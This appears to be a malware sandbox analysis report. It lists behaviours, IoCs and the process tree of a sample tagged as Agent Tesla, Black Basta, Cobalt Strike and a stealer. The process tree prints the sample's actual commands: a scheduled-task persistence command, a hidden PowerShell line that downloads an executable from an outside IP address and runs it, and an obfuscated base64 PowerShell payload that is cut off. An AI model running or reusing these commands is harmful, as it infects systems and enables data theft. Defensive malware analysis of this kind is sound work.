\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bf63e36e97.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 81bb507991.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6089caffb3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language p3hx1_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 8726cdeb67.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Chel3raiO6Ri.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8726cdeb67.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 772224823d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fontdrvhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 250ab1997b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 8726cdeb67.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
Checks processor information in registry 2 TTPs 24 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 d8bc43181b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString d8bc43181b.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 3620 timeout.exe 5520 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 64 IoCs
pid Process 4308 taskkill.exe 2404 taskkill.exe 5500 taskkill.exe 4156 taskkill.exe 5652 taskkill.exe 4564 taskkill.exe 1752 taskkill.exe 2700 taskkill.exe 3036 taskkill.exe 532 taskkill.exe 2172 taskkill.exe 3968 taskkill.exe 5780 taskkill.exe 2924 taskkill.exe 1072 taskkill.exe 5856 taskkill.exe 3688 taskkill.exe 4836 taskkill.exe 3608 taskkill.exe 5508 taskkill.exe 5236 taskkill.exe 3856 taskkill.exe 4040 taskkill.exe 3776 taskkill.exe 2404 taskkill.exe 5360 taskkill.exe 4684 taskkill.exe 1184 taskkill.exe 3780 taskkill.exe 2260 taskkill.exe 1540 taskkill.exe 5736 taskkill.exe 5948 taskkill.exe 6032 taskkill.exe 4712 taskkill.exe 3648 taskkill.exe 4872 taskkill.exe 1704 taskkill.exe 2552 taskkill.exe 3108 taskkill.exe 4884 taskkill.exe 5716 taskkill.exe 5020 taskkill.exe 4692 taskkill.exe 3484 taskkill.exe 1812 taskkill.exe 5604 taskkill.exe 4508 taskkill.exe 2412 taskkill.exe 716 taskkill.exe 2412 taskkill.exe 5892 taskkill.exe 3896 taskkill.exe 4708 taskkill.exe 1000 taskkill.exe 4736 taskkill.exe 4804 taskkill.exe 4908 taskkill.exe 3728 taskkill.exe 5536 taskkill.exe 2584 taskkill.exe 4988 taskkill.exe 1952 taskkill.exe 4580 taskkill.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133880334295601935" chrome.exe -
Modifies registry class 6 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000_Classes\Local Settings rapes.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3342763580-2723508992-2885672917-1000\{886B145B-986D-4572-8F50-D841B47B160A} chrome.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3342763580-2723508992-2885672917-1000\{EA33DEEB-2D4D-4BE1-8214-07BC486EE2EF} msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3342763580-2723508992-2885672917-1000\{00D70F46-2A2A-41D5-9F8B-D82697DBEB7A} msedge.exe -
NTFS ADS 1 IoCs
description ioc Process File created C:\C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_4074842567.txt\ cmd.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2312 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1016 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5984 powershell.exe 5984 powershell.exe 4948 TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE 4948 TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE 1060 rapes.exe 1060 rapes.exe 2944 rapes.exe 2944 rapes.exe 1016 powershell.exe 1016 powershell.exe 1016 powershell.exe 5360 powershell.exe 5360 powershell.exe 5360 powershell.exe 2716 captcha.exe 2716 captcha.exe 2716 captcha.exe 2716 captcha.exe 2716 captcha.exe 2716 captcha.exe 1656 powershell.exe 1656 powershell.exe 1656 powershell.exe 2360 powershell.exe 2360 powershell.exe 2360 powershell.exe 432 powershell.exe 432 powershell.exe 432 powershell.exe 1352 chrome.exe 1352 chrome.exe 5284 772224823d.exe 5284 772224823d.exe 2716 captcha.exe 2716 captcha.exe 2716 captcha.exe 2716 captcha.exe 2716 captcha.exe 2716 captcha.exe 5316 powershell.exe 5316 powershell.exe 5316 powershell.exe 1324 powershell.exe 1324 powershell.exe 1324 powershell.exe 5728 powershell.exe 5728 powershell.exe 5728 powershell.exe 2260 powershell.exe 2260 powershell.exe 2260 powershell.exe 5408 powershell.exe 5408 powershell.exe 5408 powershell.exe 3980 rapes.exe 3980 rapes.exe 4912 250ab1997b.exe 4912 250ab1997b.exe 5424 bf63e36e97.exe 5424 bf63e36e97.exe 5424 bf63e36e97.exe 5424 bf63e36e97.exe 5424 bf63e36e97.exe 5424 bf63e36e97.exe -
Suspicious behavior: LoadsDriver 5 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 6744 tzutil.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 5948 p3hx1_003.exe 5948 p3hx1_003.exe 5948 p3hx1_003.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5984 powershell.exe Token: SeDebugPrivilege 1016 powershell.exe Token: SeDebugPrivilege 5360 powershell.exe Token: SeDebugPrivilege 4952 tasklist.exe Token: SeDebugPrivilege 4744 tasklist.exe Token: SeDebugPrivilege 740 tasklist.exe Token: SeDebugPrivilege 1656 powershell.exe Token: SeDebugPrivilege 1952 tasklist.exe Token: SeDebugPrivilege 1956 tasklist.exe Token: SeDebugPrivilege 2360 powershell.exe Token: SeDebugPrivilege 4524 tasklist.exe Token: SeDebugPrivilege 3664 tasklist.exe Token: SeIncreaseQuotaPrivilege 2360 powershell.exe Token: SeSecurityPrivilege 2360 powershell.exe Token: SeTakeOwnershipPrivilege 2360 powershell.exe Token: SeLoadDriverPrivilege 2360 powershell.exe Token: SeSystemProfilePrivilege 2360 powershell.exe Token: SeSystemtimePrivilege 2360 powershell.exe Token: SeProfSingleProcessPrivilege 2360 powershell.exe Token: SeIncBasePriorityPrivilege 2360 powershell.exe Token: SeCreatePagefilePrivilege 2360 powershell.exe Token: SeBackupPrivilege 2360 powershell.exe Token: SeRestorePrivilege 2360 powershell.exe Token: SeShutdownPrivilege 2360 powershell.exe Token: SeDebugPrivilege 2360 powershell.exe Token: SeSystemEnvironmentPrivilege 2360 powershell.exe Token: SeRemoteShutdownPrivilege 2360 powershell.exe Token: SeUndockPrivilege 2360 powershell.exe Token: SeManageVolumePrivilege 2360 powershell.exe Token: 33 2360 powershell.exe Token: 34 2360 powershell.exe Token: 35 2360 powershell.exe Token: 36 2360 powershell.exe Token: SeDebugPrivilege 4460 tasklist.exe Token: SeDebugPrivilege 5336 tasklist.exe Token: SeDebugPrivilege 432 powershell.exe Token: SeDebugPrivilege 6016 tasklist.exe Token: SeDebugPrivilege 1156 tasklist.exe Token: SeDebugPrivilege 5576 tasklist.exe Token: SeDebugPrivilege 740 tasklist.exe Token: SeDebugPrivilege 2528 tasklist.exe Token: SeDebugPrivilege 1812 taskkill.exe Token: SeDebugPrivilege 4724 tasklist.exe Token: SeDebugPrivilege 2404 taskkill.exe Token: SeDebugPrivilege 2068 taskkill.exe Token: SeDebugPrivilege 6096 tasklist.exe Token: SeDebugPrivilege 5604 taskkill.exe Token: SeDebugPrivilege 1656 taskkill.exe Token: SeDebugPrivilege 1752 taskkill.exe Token: SeDebugPrivilege 2780 taskkill.exe Token: SeDebugPrivilege 5360 taskkill.exe Token: SeDebugPrivilege 1952 taskkill.exe Token: SeDebugPrivilege 5892 taskkill.exe Token: SeDebugPrivilege 5856 taskkill.exe Token: SeDebugPrivilege 4736 taskkill.exe Token: SeDebugPrivilege 2700 taskkill.exe Token: SeDebugPrivilege 4580 taskkill.exe Token: SeDebugPrivilege 5236 taskkill.exe Token: SeDebugPrivilege 4684 taskkill.exe Token: SeDebugPrivilege 5716 taskkill.exe Token: SeDebugPrivilege 912 taskkill.exe Token: SeDebugPrivilege 5948 taskkill.exe Token: SeDebugPrivilege 5500 taskkill.exe Token: SeDebugPrivilege 3728 taskkill.exe -
Suspicious use of FindShellTrayWindow 35 IoCs
pid Process 3588 2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3588 2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3588 2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1352 chrome.exe 1944 msedge.exe 6132 8726cdeb67.exe 6132 8726cdeb67.exe 6132 8726cdeb67.exe 6132 8726cdeb67.exe 6132 8726cdeb67.exe 6132 8726cdeb67.exe 6132 8726cdeb67.exe 6132 8726cdeb67.exe 5144 firefox.exe 5144 firefox.exe 5144 firefox.exe 5144 firefox.exe 5144 firefox.exe 5144 firefox.exe 5144 firefox.exe 5144 firefox.exe 6132 8726cdeb67.exe 5144 firefox.exe 5144 firefox.exe 5144 firefox.exe 5144 firefox.exe 5144 firefox.exe 5144 firefox.exe 5144 firefox.exe 5144 firefox.exe 5144 firefox.exe 5144 firefox.exe 6132 8726cdeb67.exe 6132 8726cdeb67.exe 6132 8726cdeb67.exe -
Suspicious use of SendNotifyMessage 27 IoCs
pid Process 3588 2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3588 2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3588 2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 6132 8726cdeb67.exe 6132 8726cdeb67.exe 6132 8726cdeb67.exe 6132 8726cdeb67.exe 6132 8726cdeb67.exe 6132 8726cdeb67.exe 6132 8726cdeb67.exe 6132 8726cdeb67.exe 5144 firefox.exe 5144 firefox.exe 5144 firefox.exe 5144 firefox.exe 6132 8726cdeb67.exe 5144 firefox.exe 5144 firefox.exe 5144 firefox.exe 5144 firefox.exe 5144 firefox.exe 5144 firefox.exe 5144 firefox.exe 5144 firefox.exe 6132 8726cdeb67.exe 6132 8726cdeb67.exe 6132 8726cdeb67.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5144 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3588 wrote to memory of 232 3588 2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 3588 wrote to memory of 232 3588 2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 3588 wrote to memory of 232 3588 2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 3588 wrote to memory of 2540 3588 2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 3588 wrote to memory of 2540 3588 2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 3588 wrote to memory of 2540 3588 2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 232 wrote to memory of 2312 232 cmd.exe 89 PID 232 wrote to memory of 2312 232 cmd.exe 89 PID 232 wrote to memory of 2312 232 cmd.exe 89 PID 2540 wrote to memory of 5984 2540 mshta.exe 93 PID 2540 wrote to memory of 5984 2540 mshta.exe 93 PID 2540 wrote to memory of 5984 2540 mshta.exe 93 PID 5984 wrote to memory of 4948 5984 powershell.exe 98 PID 5984 wrote to memory of 4948 5984 powershell.exe 98 PID 5984 wrote to memory of 4948 5984 powershell.exe 98 PID 4948 wrote to memory of 1060 4948 TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE 100 PID 4948 wrote to memory of 1060 4948 TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE 100 PID 4948 wrote to memory of 1060 4948 TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE 100 PID 1060 wrote to memory of 5524 1060 rapes.exe 105 PID 1060 wrote to memory of 5524 1060 rapes.exe 105 PID 1060 wrote to memory of 5524 1060 rapes.exe 105 PID 5524 wrote to memory of 5036 5524 cmd.exe 107 PID 5524 wrote to memory of 5036 5524 cmd.exe 107 PID 5524 wrote to memory of 5036 5524 cmd.exe 107 PID 5036 wrote to memory of 1016 5036 cmd.exe 109 PID 5036 wrote to memory of 1016 5036 cmd.exe 109 PID 5036 wrote to memory of 1016 5036 cmd.exe 109 PID 1016 wrote to memory of 5360 1016 powershell.exe 110 PID 1016 wrote to memory of 5360 1016 powershell.exe 110 PID 1016 wrote to memory of 5360 1016 powershell.exe 110 PID 1060 wrote to memory of 2716 1060 rapes.exe 112 PID 1060 wrote to memory of 2716 1060 rapes.exe 112 PID 2716 wrote to memory of 1540 2716 captcha.exe 113 PID 2716 wrote to memory of 1540 2716 captcha.exe 113 PID 2716 wrote to memory of 212 2716 captcha.exe 116 PID 2716 wrote to memory of 212 2716 captcha.exe 116 PID 212 wrote to memory of 5320 212 net.exe 118 PID 212 wrote to memory of 5320 212 net.exe 118 PID 2716 wrote to memory of 3664 2716 captcha.exe 119 PID 2716 wrote to memory of 3664 2716 captcha.exe 119 PID 2716 wrote to memory of 4952 2716 captcha.exe 121 PID 2716 wrote to memory of 4952 2716 captcha.exe 121 PID 1060 wrote to memory of 396 1060 rapes.exe 123 PID 1060 wrote to memory of 396 1060 rapes.exe 123 PID 1060 wrote to memory of 396 1060 rapes.exe 123 PID 2716 wrote to memory of 4744 2716 captcha.exe 124 PID 2716 wrote to memory of 4744 2716 captcha.exe 124 PID 2716 wrote to memory of 740 2716 captcha.exe 126 PID 2716 wrote to memory of 740 2716 captcha.exe 126 PID 2716 wrote to memory of 4692 2716 captcha.exe 128 PID 2716 wrote to memory of 4692 2716 captcha.exe 128 PID 396 wrote to memory of 4464 396 apple.exe 130 PID 396 wrote to memory of 4464 396 apple.exe 130 PID 396 wrote to memory of 4464 396 apple.exe 130 PID 396 wrote to memory of 4708 396 apple.exe 132 PID 396 wrote to memory of 4708 396 apple.exe 132 PID 396 wrote to memory of 4708 396 apple.exe 132 PID 4708 wrote to memory of 3436 4708 261.exe 133 PID 4708 wrote to memory of 3436 4708 261.exe 133 PID 4464 wrote to memory of 1308 4464 261.exe 134 PID 4464 wrote to memory of 1308 4464 261.exe 134 PID 2716 wrote to memory of 1656 2716 captcha.exe 137 PID 2716 wrote to memory of 1656 2716 captcha.exe 137 PID 3436 wrote to memory of 2412 3436 cmd.exe 138 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2268
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:7300
-
-
C:\Users\Admin\AppData\Local\Temp\2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn SEysXmamn4o /tr "mshta C:\Users\Admin\AppData\Local\Temp\wk98sbHaS.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:232 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn SEysXmamn4o /tr "mshta C:\Users\Admin\AppData\Local\Temp\wk98sbHaS.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2312
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\wk98sbHaS.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5984 -
C:\Users\Admin\AppData\Local\TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE"C:\Users\Admin\AppData\Local\TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5524 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgI